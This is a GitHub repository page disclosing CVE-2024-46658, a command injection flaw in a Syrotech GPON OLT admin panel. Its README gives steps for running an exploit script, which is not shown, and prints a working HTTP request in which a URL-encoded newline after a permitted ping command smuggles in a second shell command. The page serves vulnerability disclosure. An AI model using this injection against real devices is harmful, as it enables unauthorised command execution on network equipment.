Skip to content

jackalkarlos/CVE-2024-46658

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
imgs
imgs
 
 
README.MD
README.MD
 
 
main.py
main.py
 
 

Repository files navigation

CVE-2024-46658

Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629 Command Injection Vulnerability

Usage

1- Edit the URL in the script.

2- Edit the Cookie_Login value in the script.

3- Run the script, it will allow you to executing commands.

Vulnerability Details

GET /cgi/home.php?fun=system&page=shellCMDExec&isajax=1&runtab=1&cmdExec=1&command=ping%208.8.8.8%20-c%204%0aid&random=1725991418844 HTTP/1.1

Normally, only the ping command is allowed to be executed in the administration panel.

If you intercept the request with a proxy, add a new line byte to the end of the command parameter and type the command you want to run, it will allow you to run another command.

Authors

Mehmet Demir

About

Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629

Resources

Readme
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages